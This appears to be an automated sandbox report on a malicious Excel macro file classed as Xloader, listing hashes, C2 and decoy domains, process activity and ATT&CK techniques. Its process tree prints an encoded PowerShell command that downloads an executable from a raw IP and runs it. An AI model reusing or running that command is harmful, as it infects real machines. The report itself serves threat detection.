xloader | 3d6efe59037f7b5399b5ca0b40fa9ed242894f5be067473ef67c415fdac3fe08

General

Target

6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
Size

14KB
MD5

70820ac2bb527bb0a10747a06d2c2b0b
SHA1

7289b7ddcdcaa9450c27e1579f36d67a544cee80
SHA256

6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753
SHA512

64be67485be70ac5aa2539a88c9846282d7178e13a46895d4686ff0ce79378bf9ed4ee7bec00cb88abc0e2e8bb41a9b9ef38aa4ff25b4e4dc6334a96ad1ee4b5

Score

10^/10

xloader pufi loader rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://84.252.122.205/xcx/system.exe

Extracted

Family

xloader

Version

2.5

Campaign

pufi

C2

http://www.homestechs.com/pufi/

Decoy

fusiongroupgames.net

hugevari.com

rebeccagriffiths.com

trocaoferta.com

theslashapp.com

codezonesoftware.xyz

sottocommunications.com

minicreators.online

course2millions.com

hfm5n1dhkjqwpe.xyz

xlab-ub.com

silvanaribeirocake.com

thefabinteriordesign.com

mg-leadership.com

petbort.com

ndust.net

203040302.xyz

jakital.com

shophuunghia.info

rednacionaldejuecesrd.net

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2668	3904	cmd.exe	EXCEL.EXE

Xloader
Xloader is a rebranded version of Formbook malware.
loader xloader

Xloader Payload 4 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/1296-308-0x000000000041D450-mapping.dmp	xloader
behavioral2/memory/1296-311-0x0000000000400000-0x0000000000429000-memory.dmp	xloader
behavioral2/memory/3000-320-0x0000000003040000-0x0000000003069000-memory.dmp	xloader
behavioral2/memory/3000-323-0x0000000003070000-0x00000000031BA000-memory.dmp	xloader

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

29 1092 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Bexscoyaparcyhnfy.exeBexscoyaparcyhnfy.exe

pid process

4084 Bexscoyaparcyhnfy.exe
1296 Bexscoyaparcyhnfy.exe
Deletes itself 1 IoCs

Processes:

EXCEL.EXE

pid process

3904 EXCEL.EXE

flow	pid	process
29	1092	powershell.exe

pid	process
4084	Bexscoyaparcyhnfy.exe
1296	Bexscoyaparcyhnfy.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

Bexscoyaparcyhnfy.exeBexscoyaparcyhnfy.exeNETSTAT.EXE

description	pid	process	target process
PID 4084 set thread context of 1296	4084	Bexscoyaparcyhnfy.exe	Bexscoyaparcyhnfy.exe
PID 1296 set thread context of 3016	1296	Bexscoyaparcyhnfy.exe	Explorer.EXE
PID 1296 set thread context of 3016	1296	Bexscoyaparcyhnfy.exe	Explorer.EXE
PID 3000 set thread context of 3016	3000	NETSTAT.EXE	Explorer.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

NETSTAT.EXE

pid process

3000 NETSTAT.EXE
NTFS ADS 1 IoCs

Processes:

EXCEL.EXE

description ioc process

File created C:\Users\Admin\AppData\Local\Temp\9CC57F00\:Zone.Identifier:$DATA EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3904 EXCEL.EXE

pid	process
3000	NETSTAT.EXE

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\9CC57F00\:Zone.Identifier:$DATA	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 47 IoCs

Processes:

powershell.exeBexscoyaparcyhnfy.exeBexscoyaparcyhnfy.exeNETSTAT.EXE

pid	process
1092	powershell.exe
1092	powershell.exe
1092	powershell.exe
4084	Bexscoyaparcyhnfy.exe
4084	Bexscoyaparcyhnfy.exe
1296	Bexscoyaparcyhnfy.exe
1296	Bexscoyaparcyhnfy.exe
1296	Bexscoyaparcyhnfy.exe
1296	Bexscoyaparcyhnfy.exe
1296	Bexscoyaparcyhnfy.exe
1296	Bexscoyaparcyhnfy.exe
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE
3000	NETSTAT.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

Bexscoyaparcyhnfy.exeNETSTAT.EXE

pid process

1296 Bexscoyaparcyhnfy.exe
1296 Bexscoyaparcyhnfy.exe
1296 Bexscoyaparcyhnfy.exe
1296 Bexscoyaparcyhnfy.exe
3000 NETSTAT.EXE
3000 NETSTAT.EXE
Suspicious behavior: RenamesItself 1 IoCs

Processes:

EXCEL.EXE

pid process

3904 EXCEL.EXE

pid	process
1296	Bexscoyaparcyhnfy.exe
1296	Bexscoyaparcyhnfy.exe
1296	Bexscoyaparcyhnfy.exe
1296	Bexscoyaparcyhnfy.exe
3000	NETSTAT.EXE
3000	NETSTAT.EXE

Suspicious use of AdjustPrivilegeToken 42 IoCs

Processes:

powershell.exeBexscoyaparcyhnfy.exeBexscoyaparcyhnfy.exeNETSTAT.EXEExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	1092	powershell.exe
Token: SeDebugPrivilege	4084	Bexscoyaparcyhnfy.exe
Token: SeDebugPrivilege	1296	Bexscoyaparcyhnfy.exe
Token: SeDebugPrivilege	3000	NETSTAT.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
3904	EXCEL.EXE
3904	EXCEL.EXE
3904	EXCEL.EXE
3904	EXCEL.EXE
3904	EXCEL.EXE
3904	EXCEL.EXE
3904	EXCEL.EXE
3904	EXCEL.EXE
3904	EXCEL.EXE
3904	EXCEL.EXE
3904	EXCEL.EXE
3904	EXCEL.EXE

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeBexscoyaparcyhnfy.exeExplorer.EXENETSTAT.EXE

description	pid	process	target process
PID 3904 wrote to memory of 2668	3904	EXCEL.EXE	cmd.exe
PID 3904 wrote to memory of 2668	3904	EXCEL.EXE	cmd.exe
PID 2668 wrote to memory of 1092	2668	cmd.exe	powershell.exe
PID 2668 wrote to memory of 1092	2668	cmd.exe	powershell.exe
PID 1092 wrote to memory of 4084	1092	powershell.exe	Bexscoyaparcyhnfy.exe
PID 1092 wrote to memory of 4084	1092	powershell.exe	Bexscoyaparcyhnfy.exe
PID 1092 wrote to memory of 4084	1092	powershell.exe	Bexscoyaparcyhnfy.exe
PID 4084 wrote to memory of 1296	4084	Bexscoyaparcyhnfy.exe	Bexscoyaparcyhnfy.exe
PID 4084 wrote to memory of 1296	4084	Bexscoyaparcyhnfy.exe	Bexscoyaparcyhnfy.exe
PID 4084 wrote to memory of 1296	4084	Bexscoyaparcyhnfy.exe	Bexscoyaparcyhnfy.exe
PID 4084 wrote to memory of 1296	4084	Bexscoyaparcyhnfy.exe	Bexscoyaparcyhnfy.exe
PID 4084 wrote to memory of 1296	4084	Bexscoyaparcyhnfy.exe	Bexscoyaparcyhnfy.exe
PID 4084 wrote to memory of 1296	4084	Bexscoyaparcyhnfy.exe	Bexscoyaparcyhnfy.exe
PID 3016 wrote to memory of 3000	3016	Explorer.EXE	NETSTAT.EXE
PID 3016 wrote to memory of 3000	3016	Explorer.EXE	NETSTAT.EXE
PID 3016 wrote to memory of 3000	3016	Explorer.EXE	NETSTAT.EXE
PID 3000 wrote to memory of 1612	3000	NETSTAT.EXE	cmd.exe
PID 3000 wrote to memory of 1612	3000	NETSTAT.EXE	cmd.exe
PID 3000 wrote to memory of 1612	3000	NETSTAT.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3016

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm"
2⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Cxrgbutjpc.bat
3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBCAGUAeABzAGMAbwB5AGEAcABhAHIAYwB5AGgAbgBmAHkALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwA4ADQALgAyADUAMgAuADEAMgAyAC4AMgAwADUALwB4AGMAeAAvAHMAeQBzAHQAZQBtAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA==
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1092

C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exe
"C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4084

C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe
C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:1296

C:\Windows\SysWOW64\NETSTAT.EXE
"C:\Windows\SysWOW64\NETSTAT.EXE"
2⤵
- Suspicious use of SetThreadContext
- Gathers network information
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3000

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe"
3⤵
PID:1612

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe
MD5
1784e74e8dd172731e715668f905639b

SHA1
8f180642955070583837e55fa3c5677c059a1e3c

SHA256
ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f

SHA512
786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe
MD5
1784e74e8dd172731e715668f905639b

SHA1
8f180642955070583837e55fa3c5677c059a1e3c

SHA256
ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f

SHA512
786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b

Download Submit
C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exe
MD5
1784e74e8dd172731e715668f905639b

SHA1
8f180642955070583837e55fa3c5677c059a1e3c

SHA256
ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f

SHA512
786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b

Download Submit
C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exe
MD5
1784e74e8dd172731e715668f905639b

SHA1
8f180642955070583837e55fa3c5677c059a1e3c

SHA256
ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f

SHA512
786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b

Download Submit
C:\Users\Admin\Documents\Cxrgbutjpc.bat
MD5
31814477e987cc1e94638caa7f39f293

SHA1
c3814edcc331117303ced19f53006a4ecd09a833

SHA256
de24fa627ca42edfb1e5b46804f6dd0ed41fbcbd900eeeb56abc5cb34c1cadd4

SHA512
09a06a533d82dc086c345bd1c5ca92b2d582964c963b89e6e0c11c784effe9e4ecfc5e05f2bd3571437a04bead7c2d9fc053bd82538be17a23a473dc949fc268

Download Submit
memory/1092-294-0x000002AA54366000-0x000002AA54368000-memory.dmp

Filesize
8KB

Download
memory/1092-292-0x000002AA54360000-0x000002AA54362000-memory.dmp

Filesize
8KB

Download
memory/1092-293-0x000002AA54363000-0x000002AA54365000-memory.dmp

Filesize
8KB

Download
memory/1092-269-0x0000000000000000-mapping.dmp

Download
memory/1296-316-0x0000000001890000-0x00000000018A1000-memory.dmp

Filesize
68KB

Download
memory/1296-308-0x000000000041D450-mapping.dmp

Download
memory/1296-313-0x0000000001460000-0x0000000001471000-memory.dmp

Filesize
68KB

Download
memory/1296-311-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1296-312-0x0000000001480000-0x00000000017A0000-memory.dmp

Filesize
3.1MB

Download
memory/1612-322-0x0000000000000000-mapping.dmp

Download
memory/2668-265-0x0000000000000000-mapping.dmp

Download
memory/3000-319-0x0000000000890000-0x000000000089B000-memory.dmp

Filesize
44KB

Download
memory/3000-324-0x0000000003520000-0x00000000035B0000-memory.dmp

Filesize
576KB

Download
memory/3000-323-0x0000000003070000-0x00000000031BA000-memory.dmp

Filesize
1.3MB

Download
memory/3000-320-0x0000000003040000-0x0000000003069000-memory.dmp

Filesize
164KB

Download
memory/3000-318-0x0000000000000000-mapping.dmp

Download
memory/3016-317-0x0000000002E40000-0x0000000002F03000-memory.dmp

Filesize
780KB

Download
memory/3016-335-0x0000000005620000-0x0000000005742000-memory.dmp

Filesize
1.1MB

Download
memory/3016-314-0x00000000054B0000-0x0000000005617000-memory.dmp

Filesize
1.4MB

Download
memory/3904-119-0x00007FFD11C80000-0x00007FFD11C90000-memory.dmp

Filesize
64KB

Download
memory/3904-118-0x00007FFD11C80000-0x00007FFD11C90000-memory.dmp

Filesize
64KB

Download
memory/3904-123-0x000001B929250000-0x000001B929252000-memory.dmp

Filesize
8KB

Download
memory/3904-124-0x000001B929250000-0x000001B929252000-memory.dmp

Filesize
8KB

Download
memory/3904-130-0x00007FFD11C80000-0x00007FFD11C90000-memory.dmp

Filesize
64KB

Download
memory/3904-122-0x000001B929250000-0x000001B929252000-memory.dmp

Filesize
8KB

Download
memory/3904-120-0x00007FFD11C80000-0x00007FFD11C90000-memory.dmp

Filesize
64KB

Download
memory/3904-121-0x00007FFD11C80000-0x00007FFD11C90000-memory.dmp

Filesize
64KB

Download
memory/4084-295-0x0000000000000000-mapping.dmp

Download
memory/4084-302-0x00000000053A0000-0x00000000053A1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads